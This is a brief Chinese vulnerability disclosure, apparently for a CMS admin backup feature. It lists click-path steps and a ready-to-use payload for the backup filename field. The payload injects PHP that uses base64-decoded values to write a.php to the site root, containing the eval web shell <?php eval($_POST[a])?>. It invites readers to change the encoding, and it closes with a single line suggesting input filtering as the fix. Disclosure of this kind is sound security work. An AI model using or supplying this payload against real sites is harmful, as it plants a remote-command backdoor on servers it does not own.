1.系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件
2.在备份文件名中输入
');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pPz4='));('
备份成功就在网站根目录生成a.php,内容为<?php eval($_POST[a])?>
其中base64_decode中编码自己改吧
修复方案:
备份文件名输入验证,过滤字符
作者 lxsec
